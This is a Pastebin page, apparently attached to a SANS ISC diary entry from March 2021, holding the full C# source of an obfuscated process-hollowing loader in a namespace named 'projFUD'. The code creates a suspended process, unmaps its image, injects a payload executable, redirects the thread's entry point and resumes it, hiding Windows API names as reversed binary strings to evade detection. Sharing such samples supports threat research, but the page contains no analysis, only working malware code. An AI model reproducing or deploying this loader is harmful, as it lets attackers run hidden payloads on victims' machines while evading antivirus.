Advertisement
xme

ISC Diary 2021/03/04

xme
Mar 4th, 2021
336
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. using System;
  2. using System.Diagnostics;
  3. using System.Runtime.InteropServices;
  4. using Microsoft.VisualBasic;
  5.  
  6. namespace projFUD
  7. {
  8. public static class PA
  9. {
  10. public static string ReverseString(string Str)
  11. {
  12. string Revstr = "";
  13. int Length;
  14. Length = Str.Length - 1;
  15. while (Length >= 0)
  16. {
  17. Revstr = Revstr + Str[Length];
  18. Length--;
  19. }
  20. return Revstr;
  21. }
  22. public static string BinaryToString(string str)
  23. {
  24. string chars = System.Text.RegularExpressions.Regex.Replace(str, "[^01]", "");
  25. byte[] arr = new byte[(chars.Length / 8) - 1 + 1];
  26. for (int i = 0; i <= arr.Length - 1; i++)
  27. arr[i] = Convert.ToByte(chars.Substring(i * 8, 8), 2);
  28. return System.Text.ASCIIEncoding.ASCII.GetString(arr);
  29. }
  30. private delegate int DelegateResumeThread(IntPtr handle);
  31. private delegate bool DelegateWow64SetThreadContext(IntPtr thread, int[] context);
  32. private delegate bool DelegateSetThreadContext(IntPtr thread, int[] context);
  33. private delegate bool DelegateWow64GetThreadContext(IntPtr thread, int[] context);
  34. private delegate bool DelegateGetThreadContext(IntPtr thread, int[] context);
  35. private delegate int DelegateVirtualAllocEx(IntPtr handle, int address, int length, int type, int protect);
  36. private delegate bool DelegateWriteProcessMemory(IntPtr process, int baseAddress, byte[] buffer, int bufferSize, ref int bytesWritten);
  37. private delegate bool DelegateReadProcessMemory(IntPtr process, int baseAddress, ref int buffer, int bufferSize, ref int bytesRead);
  38. private delegate int DelegateZwUnmapViewOfSection(IntPtr process, int baseAddress);
  39. private delegate bool DelegateCreateProcessA(string applicationName, string commandLine, IntPtr processAttributes, IntPtr threadAttributes,
  40. bool inheritHandles, uint creationFlags, IntPtr environment, string currentDirectory, ref StartupInformation startupInfo, ref ProcessInformation processInformation);
  41.  
  42.  
  43. private static string[] AL = Convert.ToString("0011001000110011011011000110010101101110011100100110010101101011|0110110001101100011001000111010001101110|011001000110000101100101011100100110100001010100011001010110110101110101011100110110010101010010|011101000111100001100101011101000110111001101111010000110110010001100001011001010111001001101000010101000111010001100101010100110011010000110110011101110110111101010111|01110100011110000110010101110100011011100110111101000011011001000110000101100101011100100110100001010100011101000110010101010011|011101000111100001100101011101000110111001101111010000110110010001100001011001010111001001101000010101000111010001100101010001110011010000110110011101110110111101010111|01110100011110000110010101110100011011100110111101000011011001000110000101100101011100100110100001010100011101000110010101000111|0111100001000101011000110110111101101100011011000100000101101100011000010111010101110100011100100110100101010110|011110010111001001101111011011010110010101001101011100110111001101100101011000110110111101110010010100000110010101110100011010010111001001010111|0111100101110010011011110110110101100101010011010111001101110011011001010110001101101111011100100101000001100100011000010110010101010010|0110111001101111011010010111010001100011011001010101001101100110010011110111011101100101011010010101011001110000011000010110110101101110010101010111011101011010|0100000101110011011100110110010101100011011011110111001001010000011001010111010001100001011001010111001001000011|").Split(new string[] { "|" }, StringSplitOptions.None);
  44.  
  45. private static string Kernel32 = BinaryToString(AL[0]);
  46. private static string ntdll = BinaryToString(AL[1]);
  47. private static string RsmThread = BinaryToString(AL[2]);
  48. private static string Wow64SetThreadCtx = BinaryToString(AL[3]);
  49. private static string SetThreadCtx = BinaryToString(AL[4]);
  50. private static string Wow64GetThreadCtx = BinaryToString(AL[5]);
  51. private static string GetThreadCtx = BinaryToString(AL[6]);
  52. private static string VirtualAllcEx = BinaryToString(AL[7]);
  53. private static string WriteProcessMem = BinaryToString(AL[8]);
  54. private static string ReadProcessMem = BinaryToString(AL[9]);
  55. private static string ZwUnmapViewOfSec = BinaryToString(AL[10]);
  56. private static string CreateProcA = BinaryToString(AL[11]);
  57.  
  58.  
  59. private static readonly DelegateResumeThread ResumeThread = LoadApi<DelegateResumeThread>(ReverseString(Kernel32), ReverseString(RsmThread));
  60. private static readonly DelegateWow64SetThreadContext Wow64SetThreadContext = LoadApi<DelegateWow64SetThreadContext>(ReverseString(Kernel32), ReverseString(Wow64SetThreadCtx));
  61. private static readonly DelegateSetThreadContext SetThreadContext = LoadApi<DelegateSetThreadContext>(ReverseString(Kernel32), ReverseString(SetThreadCtx));
  62. private static readonly DelegateWow64GetThreadContext Wow64GetThreadContext = LoadApi<DelegateWow64GetThreadContext>(ReverseString(Kernel32), ReverseString(Wow64GetThreadCtx));
  63. private static readonly DelegateGetThreadContext GetThreadContext = LoadApi<DelegateGetThreadContext>(ReverseString(Kernel32), ReverseString(GetThreadCtx));
  64. private static readonly DelegateVirtualAllocEx VirtualAllocEx = LoadApi<DelegateVirtualAllocEx>(ReverseString(Kernel32), ReverseString(VirtualAllcEx));
  65. private static readonly DelegateWriteProcessMemory WriteProcessMemory = LoadApi<DelegateWriteProcessMemory>(ReverseString(Kernel32), ReverseString(WriteProcessMem));
  66. private static readonly DelegateReadProcessMemory ReadProcessMemory = LoadApi<DelegateReadProcessMemory>(ReverseString(Kernel32), ReverseString(ReadProcessMem));
  67. private static readonly DelegateZwUnmapViewOfSection ZwUnmapViewOfSection = LoadApi<DelegateZwUnmapViewOfSection>(ReverseString(ntdll), ReverseString(ZwUnmapViewOfSec));
  68. private static readonly DelegateCreateProcessA CreateProcessA = LoadApi<DelegateCreateProcessA>(ReverseString(Kernel32), ReverseString(CreateProcA));
  69.  
  70. [DllImport("kernel32", SetLastError = true)]
  71. private static extern IntPtr LoadLibraryA([MarshalAs(UnmanagedType.VBByRefStr)] ref string Name);
  72. [DllImport("kernel32", CharSet = CharSet.Ansi, SetLastError = true, ExactSpelling = true)]
  73. private static extern IntPtr GetProcAddress(IntPtr hProcess, [MarshalAs(UnmanagedType.VBByRefStr)] ref string Name);
  74. private static CreateApi LoadApi<CreateApi>(string name, string method)
  75. {
  76. return (CreateApi)(object)Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref name), ref method), typeof(CreateApi));
  77. }
  78.  
  79. [StructLayout(LayoutKind.Sequential, Pack = 1)]
  80. private struct ProcessInformation
  81. {
  82. public readonly IntPtr ProcessHandle;
  83. public readonly IntPtr ThreadHandle;
  84. public readonly uint ProcessId;
  85. private readonly uint ThreadId;
  86. }
  87. [StructLayout(LayoutKind.Sequential, Pack = 1)]
  88. private struct StartupInformation
  89. {
  90. public uint Size;
  91. private readonly string Reserved1;
  92. private readonly string Desktop;
  93. private readonly string Title;
  94. [MarshalAs(UnmanagedType.ByValArray, SizeConst = 36)]
  95. private readonly byte[] Misc;
  96. private readonly IntPtr Reserved2;
  97. private readonly IntPtr StdInput;
  98. private readonly IntPtr StdOutput;
  99. private readonly IntPtr StdError;
  100. }
  101.  
  102.  
  103. public static void Execute(string path, byte[] payload)
  104. {
  105. for (int i = 0; i < 5; i++)
  106. {
  107. int readWrite = 0;
  108. StartupInformation si = new StartupInformation();
  109. ProcessInformation pi = new ProcessInformation();
  110. si.Size = UInt32.Parse(Marshal.SizeOf(typeof(StartupInformation)).ToString());
  111. string ToInt32 = System.Text.Encoding.Default.GetString(new byte[] { 0x54, 0x6F, 0x49, 0x6E, 0x74, 0x33, 0x32 });
  112. string ToInt16 = System.Text.Encoding.Default.GetString(new byte[] { 0x54, 0x6F, 0x49, 0x6E, 0x74, 0x31, 0x36 });
  113.  
  114. try
  115. {
  116. if (!CreateProcessA(path, string.Empty, IntPtr.Zero, IntPtr.Zero, false, 4 | 134217728, IntPtr.Zero, null, ref si, ref pi)) throw new Exception();
  117. int fileAddress = (int)Interaction.CallByName(typeof(BitConverter).GetMethod(ToInt32), BinaryToString("010010010110111001110110011011110110101101100101"), CallType.Method, new object[] { null, new object[] { payload, (30 * 2) } });
  118. int imageBase = (int)Interaction.CallByName(typeof(BitConverter).GetMethod(ToInt32), BinaryToString("010010010110111001110110011011110110101101100101"), CallType.Method, new object[] { null, new object[] { payload, fileAddress + (26 * 2) } });
  119. int[] context = new int[Convert.ToInt32(89 + 90)];
  120. context[0] = 65538;
  121. if (IntPtr.Size == 4)
  122. { if (!GetThreadContext(pi.ThreadHandle, context)) throw new Exception(); }
  123. else
  124. { if (!Wow64GetThreadContext(pi.ThreadHandle, context)) throw new Exception(); }
  125. int ebx = context[(20 + 21)];
  126. int baseAddress = 0;
  127. if (!ReadProcessMemory(pi.ProcessHandle, ebx + 8, ref baseAddress, 4, ref readWrite)) throw new Exception();
  128. if (imageBase == baseAddress)
  129. if (ZwUnmapViewOfSection(pi.ProcessHandle, baseAddress) != 0) throw new Exception();
  130. int sizeOfImage = (int)typeof(BitConverter).GetMethod(ToInt32).Invoke(null, new object[] { payload, fileAddress + 80 });
  131. int sizeOfHeaders = (int)typeof(BitConverter).GetMethod(ToInt32).Invoke(null, new object[] { payload, fileAddress + 84 });
  132. bool allowOverride = false;
  133. int newImageBase = VirtualAllocEx(pi.ProcessHandle, imageBase, sizeOfImage, 12288, 64);
  134.  
  135. if (newImageBase == 0) throw new Exception();
  136. if (!WriteProcessMemory(pi.ProcessHandle, newImageBase, payload, sizeOfHeaders, ref readWrite)) throw new Exception();
  137. int sectionOffset = fileAddress + 248;
  138. short numberOfSections = BitConverter.ToInt16(payload, fileAddress + 6);
  139. for (int I = 0; I < numberOfSections; I++)
  140. {
  141. int virtualAddress = (int)typeof(BitConverter).GetMethod(ToInt32).Invoke(null, new object[] { payload, sectionOffset + 12 });
  142. int sizeOfRawData = (int)typeof(BitConverter).GetMethod(ToInt32).Invoke(null, new object[] { payload, sectionOffset + 16 });
  143. int pointerToRawData = (int)typeof(BitConverter).GetMethod(ToInt32).Invoke(null, new object[] { payload, sectionOffset + 20 });
  144. if (sizeOfRawData != 0)
  145. {
  146. byte[] sectionData = new byte[sizeOfRawData];
  147. Buffer.BlockCopy(payload, pointerToRawData, sectionData, 0, sectionData.Length);
  148. if (!WriteProcessMemory(pi.ProcessHandle, newImageBase + virtualAddress, sectionData, sectionData.Length, ref readWrite)) throw new Exception();
  149. }
  150. sectionOffset += 40;
  151. }
  152. byte[] GB = BitConverter.GetBytes(newImageBase);
  153. if (!WriteProcessMemory(pi.ProcessHandle, ebx + 8, GB, 4, ref readWrite)) throw new Exception();
  154. int addressOfEntryPoint = (int)Interaction.CallByName(typeof(BitConverter).GetMethod(ToInt32), BinaryToString("010010010110111001110110011011110110101101100101"), CallType.Method, new object[] { null, new object[] { payload, fileAddress + 40 } });
  155. if (allowOverride) newImageBase = imageBase;
  156. context[44] = newImageBase + addressOfEntryPoint;
  157. if (IntPtr.Size == 4)
  158. {
  159. var x = SetThreadContext(pi.ThreadHandle, context);
  160. if (!x)
  161. {
  162. throw new Exception();
  163. }
  164. }
  165. else
  166. {
  167. var y = Wow64SetThreadContext(pi.ThreadHandle, context);
  168. if (!y)
  169. {
  170. throw new Exception();
  171. }
  172. }
  173.  
  174. int r = (int)Interaction.CallByName(ResumeThread, BinaryToString("010010010110111001110110011011110110101101100101"), CallType.Method, new object[] { pi.ThreadHandle });
  175.  
  176. if (r == -1 * 1)
  177. {
  178. throw new Exception();
  179. }
  180. }
  181. catch
  182. {
  183. Process.GetProcessById(Convert.ToInt32(pi.ProcessId)).Kill();
  184. continue;
  185. }
  186. break;
  187. }
  188. }
  189. }
  190. }
Advertisement
Advertisement
Advertisement
RAW Paste Data Copied
Advertisement